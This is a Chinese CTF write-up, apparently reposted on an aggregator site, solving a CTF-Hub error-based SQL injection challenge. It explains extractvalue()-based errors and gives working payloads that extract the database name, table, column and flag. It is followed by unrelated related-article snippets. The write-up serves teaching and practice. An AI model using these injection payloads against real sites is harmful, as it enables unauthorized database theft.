CTF-Hub SQL 报错注入(纯手动注入)

在这里插入图片描述
当输入1时,发现只有查询正确,基本上可以判断出没有回显

开始注入(工具hackerBar)

题目是报错注入,方向就比较明显,大致说一下用到的函数和原理。

常见报错注入函数:

  1. 通过 floor() 报错注入
  2. 通过 extractValue() 报错注入
  3. 通过 updateXml() 报错注入
  4. 通过 NAME_Const() 报错注入
  5. 通过 join() 报错注入
  6. 通过 exp() 报错注入

不常见报错注入函数:

  1. 通过 geometryCollection() 报错注入
  2. 通过 polygon() 报错注入
  3. 通过 multipoint() 报错注入
  4. 通过 multlinestring() 报错注入
  5. 通过 multpolygon() 报错注入
  6. 通过 linestring() 报错注入

extractValue() 报错注入

函数 extractValue() 包含两个参数 ,第一个参数是 XML文档对象名称 ,第二个参数是 路径
格式:

extractvalue(列名,'查询内容路径')

当查询的路径不存在时,,也不会报错:

select extractvalue(doc,'/xxx/xxxx/xxxxx') from xml;

但第二个查询路径必须以斜杠(/)开始,否则将引起报错

构造报错 sql 的语句:

select extractvalue(doc,'~/xxx/xxxx/xxxxx') from xml;

报错语句:

ERROR 2013 (HY000): Lost connection to MySQL server during query
No connection. Trying to reconnect...
Connection id:    97
Current database: dbxxERROR 1105 (HY000): XPATH syntax error: '~xxx/xxxx/xxxxx'

原理
在ASCII码表中,0x7e这个十六进制数代表符号这个符号在xpath语法中是不存在的,因此总能报错。同理,肯定也有其他字符是XPATH语法不支持的。 ! 也是不支持的,因此也可以使用。

开始注入(工具hackerBar)

与其他注入其实语句和思路相同,只需要把红字替换成你需要的 sql语句 即可回显

1 and extractValue(1,concat(0x7e,(select database()))) --+

在这里插入图片描述
此时已经得到数据库名:sqli

爆表和爆列在上一节已经讲过:

CTF-Hub SQL 字符型注入(纯手动注入)

语句我也贴一下:
爆表:

1 and extractValue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1)))  --+

在这里插入图片描述

爆列(列名也是 flag):

1 and extractValue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1)))  --+

在这里插入图片描述

拿到flag:

1 and extractValue(1,concat(0x7e,(select flag from flag)))  --+

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/887622.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2024 阿里云的Debian12.8,安装mariadb【图文讲解】

目录 一、安装 MariaDB Server 二、登录到MariaDB,记得输入密码(注意:密码非明文,只管输入,完成以后回车) 三、创建用户 root,并允许从任何主机连接 四、授予用户访问权限 五、刷新权限 六、…

力扣刷题TOP101:1.BM1 反转链表

目录: 目的 思路 复杂度 记忆秘诀 python代码 目的 1 -> 2 -> 3 -> 4 -> 5 反转成 5 -> 4 -> 3 -> 2 -> 1 思路 这个任务主要是把单链表的方向完全反过来,可以想象成一辆车(prev)开到终点&#xff…

新用户引导库-driverjs

一个比好用的新用户引导的库 driverjs 在做这个功能时,首先要确定目标是什么样子的, 如果只是随意点击下一步下一步,那我感觉可能用图片轮播图的方式会快一点,更容易解决且方便,想要什么步骤 只需要更改图片就好&…

鸿蒙保存读取沙盒文件

鸿蒙保存读取沙盒文件 参考文件 有些时候需要保存并读取沙盒环境的文件。这样做保存一些临时文件,确保发送网络之前数据不会丢失,或者存储一些只需要在本地使用的数据等等。本文介绍一下相关的操作方式。 获取文件路径 想要保存或者读取文件&#xf…

八、利用CSS制作导航栏菜单的习题

题目一&#xff1a; 利用CSS技术&#xff0c;结合链接和样表&#xff0c;设计并实现“ 山水之间 ”页面。 运行效果&#xff1a; 代码 <!DOCTYPE html> <html><head><meta charset"utf-8" /><title>山水之间</title>&l…

ML 系列:第 31 节— 机器学习中的协方差和相关性

文章目录 一、说明二、协方差和相关性2.1 协方差的概念2.1 相关 三、有关关联的高级主题 &#xff08;有关详细信息&#xff09;3.1 相关性和独立性3.2 零相关性和依赖性示例 四、相关性和因果关系五、结论 一、说明 协方差量化了两个随机变量协同变化的程度。当一个变量的较高…

Linux内核中错误码与错误处理函数

Linux错误处理 1. Linux下编号前50错误码 内核定义了许多常见的错误码&#xff0c;如EPERM&#xff08;操作不允许&#xff09;、ENOENT&#xff08;无此文件或目录&#xff09;、EINTR系统调用被中断&#xff09;等。 位于文件linux\include\uapi\asm-generic\errno-base.h下…

谈谈微服务的常用组件

由于微服务给系统开发带来了一些问题和挑战&#xff0c;如服务调用的复杂性、分布式事务的处理、服务的动态管理等&#xff0c;为了更好地解决这些问题和挑战&#xff0c;各种微服务治理的组件应运而生&#xff0c;充当微服务架构的基石和支撑&#xff0c;常用组件如下表&#…

2024算法基础公选课练习七(BFS1)

一、前言 还是偏基础的bfs&#xff0c;但是有几个题不是很好写 二、题目总览 三、具体题目 3.1 问题 A: 数据结构-队列-奇怪的电梯 我的代码 可以看成求一维平面的bfs最短路 #include <bits/stdc.h> using i64 long long; using pii std::pair<int,int>; co…

富格林:可信策略阻挠交易受损

富格林指出&#xff0c;阻挠交易受损最重要的一个步骤就是要不断地总结误区采取可信策略进行操作。投资误区有很多种&#xff0c;投资者需要不断总结和丰富可信经验来提升自己。以下是富格林总结的几点需要防备的误区&#xff0c;这样才能够在有效避免阻挠交易受损。 始终坚持…

探索.NET世界的无限可能——带你轻松了解.NET

前言 由于目前用到的技术栈有C#&#xff0c;而学习C#离不开.NET框架&#xff0c;正如学习Java离不开学习Spring框架一样。 .NET是微软开发的一个非常强大的框架&#xff0c;它不仅擅长桌面和移动开发&#xff0c;而且还能够支持Web开发和游戏引擎开发&#xff0c;在现在热门的…

Android --- Kotlin,Fragment 怎么使用 ObserveForever 监听 Livedata

Android — Kotlin&#xff0c;Fragment 怎么使用 ObserveForever 监听 Livedata 在 Kotlin 中&#xff0c;observeForever() 是 LiveData 提供的一个方法&#xff0c;它用于永久地观察 LiveData 对象的数据变化&#xff0c;不依赖于生命周期的管理。这通常在不依赖 Fragment …

HTTP 缓存技术

HTTP 缓存技术 1. 缓存概述 HTTP 缓存技术通过存储已请求资源的副本&#xff0c;减少重复请求、提升响应速度&#xff0c;并节省带宽。缓存可以在客户端、代理服务器、CDN&#xff08;内容分发网络&#xff09;等位置进行&#xff0c;能够有效提升 Web 应用的性能、降低服务器…

[OpenHarmony5.0][Docker][环境]OpenHarmony5.0 Docker pull线上镜像方式构建编译环境

T. 已测试目录 主机类型主机版本Docker镜像版本结果WSL2Ubuntu22.04Ubuntu20.04PASSWSL2Ubuntu22.04Ubuntu18.04PASS R. 软硬件要求&#xff1a; 硬件&#xff1a; 设备容量备注硬盘>500G多版本系统测试&#xff0c;必须固态&#xff0c;否则编译卡死硬盘>300G单系统…

Accessibility API

开发类似Grammarly的桌面级应用程序&#xff0c;需要将自然语言处理 (NLP)、桌面应用开发和系统交互技术结合起来。以下是完整的开发步骤和关键技术的详细说明&#xff1a; 1. 确定核心功能 一个类似于Grammarly的应用程序主要提供以下功能&#xff1a; 实时语法和拼写检查&a…

RHCE——SELinux

SELinux 什么是SELinux呢&#xff1f;其实它是【Security-Enhanced Linux】的英文缩写&#xff0c;字母上的意思就是安全强化Linux的意思。 SELinux是由美国国家安全局(NSA)开发的&#xff0c;当初开发的原因是很多企业发现&#xff0c;系统出现问题的原因大部分都在于【内部…

如何分析Windows防火墙日志

Windows防火墙&#xff0c;也被称为Windows Defender Firewall&#xff0c;是一种内置的安全功能&#xff0c;可以主动监控和分析运行Windows操作系统的计算机上通过Windows防火墙的网络流量&#xff0c;主要目的是作为计算机和互联网或其他网络之间的屏障&#xff0c;使管理员…

Python - 函数(四)

函数&#xff1a;在编写程序的过程中&#xff0c;有某一功能代码块出现多次&#xff0c; 但是为了提高编写的效率以及代码的重用&#xff0c;所以把具有独立功能的代码块组织为一个小模块&#xff0c;这就是函数 ‌Python中的函数‌是一组被命名的可执行代码&#xff0c;用于完…

2024-11-27 学习人工智能的Day32 神经网络与反向传播

一、神经网络 神经网络神经网络&#xff08;Neural Networks&#xff09;是一种模拟人脑神经元网络结构的计算模型&#xff0c;用于处理复杂的模式识别、分类和预测等任务。 人工神经元是神经网络的基础构建单元&#xff0c;模仿了神武神经元的工作原理&#xff0c;核心功能是…

代码随想录打卡DAY21

算法记录第21天 [二叉树] 1.LeetCode 538. 把二叉搜索树转换为累加树 题目描述&#xff1a; 给出二叉 搜索 树的根节点&#xff0c;该树的节点值各不相同&#xff0c;请你将其转换为累加树&#xff08;Greater Sum Tree&#xff09;&#xff0c;使每个节点 node 的新值等于原…